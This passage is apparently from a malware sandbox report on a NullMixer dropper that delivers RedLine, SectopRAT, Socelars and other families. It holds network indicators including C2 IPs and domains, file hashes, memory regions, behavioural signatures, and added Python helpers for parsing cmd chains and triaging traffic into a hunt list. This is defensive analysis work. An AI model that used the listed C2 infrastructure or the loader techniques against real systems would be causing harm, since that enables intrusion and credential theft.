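        if m := COPY_RE.match(step):
            src, dst = m.group(2).rsplit(None, 1)
            info["source"], info["renamed_to"] = src.strip('"'), dst
        elif m := START_RE.match(step):
            info["started"], info["args"] = m.group(1), m.group(2)
        elif m := FOR_RE.search(step):
            var, item, body = m.groups()
            # %~nxU expands to the file name plus extension of the loop item
            info["taskkill"] = re.sub(r"%~nx" + var, lambda _: ntpath.basename(item), body, flags=re.I)
    return info


if __name__ == "__main__":
    print(parse_assembly(cmd_steps(inner_command(MSHTA_ASSEMBLER))))
    print(parse_copy_run(cmd_steps(inner_command(MSHTA_COPYRUN))))
```

The expanded taskkill string the example produces is exactly the taskkill command line the report records as a child of the second cmd.exe, which is a useful cross-check when reading such chains. The splitter ignores quoting, so a `&` inside a quoted argument would need a real cmd tokenizer.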
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| NL | 45.133.1.182:80 | | tcp |
| N/A | 127.0.0.1:49289 | | tcp |
| N/A | 127.0.0.1:49291 | | tcp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | ggg-cl.biz | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| NL | 45.133.1.107:80 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| DE | 2.23.176.163:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 2.23.181.156:80 | www.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| FR | 51.178.186.149:80 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
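The Network table above mixes resolver traffic, certificate fetches, the lookup of the sandbox's external IP, connections to legitimate hosting services, and repeated raw-IP connections on unusual ports (4805, 27643, 8080) that carry no domain at all. The following Python is an added example, not part of the sandbox report: it parses an excerpt of the table (constructed from rows above, including the form where the protocol lands in the Domain column) and sorts the endpoints into those buckets, so that the raw C2 candidates and the domains that were resolved but never reached end up in a hunt list. The classification sets are assumptions of the example; the report itself only flags iplogger.org and pastebin.com as abused hosting and ip-api.com as the IP lookup.

```python
"""Added example (not part of the sandbox report): turn the Network table above
into a hunt list, separating C2 candidates from resolver, certificate and
legitimate-hosting noise."""
import ipaddress
from collections import Counter

# Constructed input: an excerpt of the Network table.  Rows with no domain
# sometimes carry the protocol in the Domain column; the parser accepts both.
NETWORK_TABLE = """\
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| NL | 45.133.1.182:80 | tcp | |
| N/A | 127.0.0.1:49289 | | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | ggg-cl.biz | udp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| DE | 2.23.176.163:80 | crl.microsoft.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 72.84.118.132:8080 | | tcp |
| LV | 45.142.215.47:27643 | tcp
"""

# Assumptions of the example: which hosts are infrastructure noise and which are
# legitimate services that malware commonly uses for hosting or C2.
PROTOS = {"tcp", "udp"}
RESOLVERS = {"8.8.8.8"}
CERT_NOISE = {"crl.microsoft.com", "www.microsoft.com", "c.pki.goog"}
ABUSED_HOSTING = {"iplogger.org", "pastebin.com", "cdn.discordapp.com"}
IP_LOOKUP = {"ip-api.com"}
COMMON_PORTS = {80, 443}


def parse_rows(table: str) -> list[dict]:
    """Parse the pipe-delimited rows, repairing rows whose domain cell is missing."""
    rows = []
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 3 or cells[0] == "Country":
            continue
        cells += [""] * (4 - len(cells))            # tolerate a missing trailing cell
        country, dest, domain, proto = cells[:4]
        if domain.lower() in PROTOS and not proto:   # protocol shifted into the Domain column
            domain, proto = "", domain
        host, _, port = dest.rpartition(":")
        rows.append({"country": country, "host": host, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def triage(table: str) -> dict:
    """Bucket the endpoints: resolved-only domains, raw-IP connections, odd ports, known noise."""
    rows = parse_rows(table)
    queried = {r["domain"] for r in rows if r["proto"] == "udp" and r["host"] in RESOLVERS}
    connected = {r["domain"] for r in rows if r["proto"] == "tcp" and r["domain"]}
    direct = Counter(f'{r["host"]}:{r["port"]}' for r in rows
                     if r["proto"] == "tcp" and not r["domain"]
                     and not ipaddress.ip_address(r["host"]).is_loopback)
    return {
        "resolved_only": sorted(queried - connected),
        "direct_ip": direct,
        "odd_ports": sorted(e for e in direct if int(e.rsplit(":", 1)[1]) not in COMMON_PORTS),
        "abused_hosting": connected & ABUSED_HOSTING,
        "ip_lookup": connected & IP_LOOKUP,
        "noise": connected & CERT_NOISE,
        "unclassified": sorted(connected - ABUSED_HOSTING - IP_LOOKUP - CERT_NOISE),
    }


def hunt_list(t: dict) -> list[str]:
    """Indicators worth blocking or searching for: raw C2 hosts plus domains that
    were looked up but never reached (dead, sinkholed or rotated infrastructure)."""
    hosts = {e.rsplit(":", 1)[0] for e in t["direct_ip"]}
    return sorted(hosts | set(t["resolved_only"]))


if __name__ == "__main__":
    result = triage(NETWORK_TABLE)
    for key, value in result.items():
        print(key, value)
    print("hunt:", hunt_list(result))
```

The abused-hosting and IP-lookup buckets are kept out of the hunt list on purpose: blocking pastebin.com or ip-api.com outright causes collateral damage, and those names are better used as correlation points (which process resolved them, what was fetched) than as blocklist entries.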
Files
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe
| MD5 | 2d62b8cf0d215971e12220d96a099e81 |
| SHA1 | 72e43b82e9510321dbb5130d35d09acd850c7ad8 |
| SHA256 | bec993083a69304244f13e191173e31d23c634567ab21484258195086112aa40 |
| SHA512 | e0763f93143060599658b64cc3c0fa8e8be62c4af2567ab08868492546f200bb5a91b367d2eea296b0a6d71c39a0f0000d71a66aabc1d36664d01dedbfbc5f59 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/2584-50-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zS49891AC6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2584-53-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2584-66-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2584-64-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-65-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2584-63-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-62-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-72-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2584-71-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2584-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-75-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2584-77-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2584-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-76-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-73-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07be2debb1a.exe
| MD5 | 7908fc00709580c4e12534bcd7ef8aae |
| SHA1 | 616616595f65c8fdaf1c5f24a4569e6af04e898f |
| SHA256 | 55fc7e624b75a66d04ed1dfc8d6957ceb013db94e9be29e779280378011d1399 |
| SHA512 | 0d5a72410d628d3bf6ff9188a69f378e04184ed603a620659f4084bd8a5a392577849c5aa895706eec5213b0036d24faafb8e153b458b5f53d8da7ce636b7a00 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0741b6b6c3.exe
| MD5 | f75e29fdd8803d46736be53a119c0814 |
| SHA1 | e75af0dd2e15043e49684e599bd76f037abbee64 |
| SHA256 | fe9cac8ff86d68feb4e76f8bc04c345e767353feed2a5fe8c98cc9a42b8739af |
| SHA512 | 223587ca8c9974976f07a683607cabf9e6414878121be48a4831ce7b5c2bbde7dcfc3dd6454999c135952fddc307d99b47c008a5417d3ab91b58775a6dc92b12 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0752b359bd184a.exe
| MD5 | aee0df0b273236965ad033c9a4be275f |
| SHA1 | ac8124f037441434c9881a2649e2e62bf276b1a6 |
| SHA256 | 622752355b43c5c019c6242b40c93288006b61fea2039d467bff1ac9c7e4dd85 |
| SHA512 | 759013680b6019d2783aabc1313bd949c564b7a8ecd267b626a9011963c0622dccfe3853f30df3c5d4434683adcf08372305abfae974692ed5cbc2d55842567f |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07fcb30681127.exe
| MD5 | 4a01f3a6efccd47150a97d7490fd8628 |
| SHA1 | 284af830ac0e558607a6a34cf6e4f6edc263aee1 |
| SHA256 | e29476ee4544a426c1518728034242be3e6821f79378ae2faffedecc194c5a97 |
| SHA512 | 4d0e886e3227f09c177f1a9836ee65766aafc7f48458c944da1afc061106dfbbf47455e54065d22de955b44044817ac900ee9ac80b434ad73bf53262acb49519 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun075246a0bffeab.exe
| MD5 | 118cf2a718ebcf02996fa9ec92966386 |
| SHA1 | f0214ecdcb536fe5cce74f405a698c1f8b2f2325 |
| SHA256 | 7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d |
| SHA512 | fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0750d1e499.exe
| MD5 | 725101e70fc2007633fca44a6129d46c |
| SHA1 | cd4806d4b7889bf86e80b60e207fd78b32c8c841 |
| SHA256 | 7d7b882da2072450c3924d2b0cbc22e74d4155e8db6a9a14d4932ca5dadf8967 |
| SHA512 | 72c23216429adb6ee0ac52224ace136acedb5f7d4af9dac2bb557cda1843e5239480b97e4be86abc9654e8a273a3f69af36c7dd0500efd247ab3b0b678e7194d |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe
| MD5 | 0f1ef1bad121bd626d293df70f9c73f8 |
| SHA1 | 790d44990c576d1da37e535a447dc6b7270b4ca2 |
| SHA256 | 327e9994d62d8a1042f96db61359c9258ebc9c703f9a536801da79b196c221d3 |
| SHA512 | b626ccadfd53383a1f18d4604b4adac6ac5a0bd010089be26dd026e4a44f565813cff3711cc9343c9112a6cbcdcff208d209fba9e94f1103746e50af83be171b |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07dc9d2dae027.exe
| MD5 | 69f0fe993f6e63c9e7a2b739ec956e82 |
| SHA1 | 6f9a1b7a9fceac26722da17e204f57a47d7b66a5 |
| SHA256 | ee4355899a94ed5b369d8a8851d52ef2286c01af577e70bc82f43a5f4716fb0b |
| SHA512 | 1f81e0b8c3a5748a2aa47e02f8b1c1fc09e8d81871a607a148343ac3c579b82685f41eddf2070976a31aabccef0e70303c05d30e0c78c287a5c478c886185b1a |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07778dd9fc6d53.exe
| MD5 | ecc773623762e2e326d7683a9758491b |
| SHA1 | ad186c867976dc5909843418853d54d4065c24ba |
| SHA256 | 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838 |
| SHA512 | 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07e3a022a8656c5ca.exe
| MD5 | b7ed5241d23ac01a2e531791d5130ca2 |
| SHA1 | 49df6413239d15e9464ed4d0d62e3d62064a45e9 |
| SHA256 | 98ac9097e514852804ca276aac3a319b07acf7219aef34e0d4fff6ea5b094436 |
| SHA512 | 1e4402c695a848bd62f172bd91eb3a4df8067c1fbc5f95dfd601d7a8c24ad81ac2e1f2e1280160087da8c8fbb72e957259661d759d8f7d9317cef3c64429a126 |
memory/2136-143-0x0000000000130000-0x0000000000138000-memory.dmp
memory/1096-142-0x0000000000340000-0x0000000000356000-memory.dmp
memory/2124-144-0x0000000000B00000-0x0000000000B72000-memory.dmp
memory/2116-145-0x0000000001D00000-0x0000000001D24000-memory.dmp
memory/1096-146-0x00000000002D0000-0x00000000002D6000-memory.dmp
memory/2116-151-0x0000000001D30000-0x0000000001D52000-memory.dmp
memory/2264-177-0x0000000000E30000-0x0000000000F7C000-memory.dmp
memory/2584-200-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-199-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2584-198-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-197-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2584-195-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2584-186-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2704-191-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-189-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-188-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-187-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2704-184-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-182-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-180-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-178-0x0000000000400000-0x0000000000422000-memory.dmp
memory/236-204-0x0000000000400000-0x00000000016C7000-memory.dmp
memory/2116-207-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/3048-206-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/2264-208-0x0000000000E30000-0x0000000000F7C000-memory.dmp
memory/2264-209-0x0000000002E00000-0x0000000002EA5000-memory.dmp
memory/2264-210-0x0000000000F80000-0x0000000001012000-memory.dmp
memory/2264-213-0x0000000000F80000-0x0000000001012000-memory.dmp
memory/3048-214-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/2264-220-0x0000000000F80000-0x0000000001012000-memory.dmp
memory/2264-221-0x0000000002EB0000-0x0000000003BF1000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-22 09:57
Reported
2024-11-22 09:59
Platform
win10v2004-20241007-en
Max time kernel
124s
Max time network
148s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07be2debb1a.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2836 set thread context of 1580 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07e3a022a8656c5ca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun075246a0bffeab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07778dd9fc6d53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07be2debb1a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe | N/A |
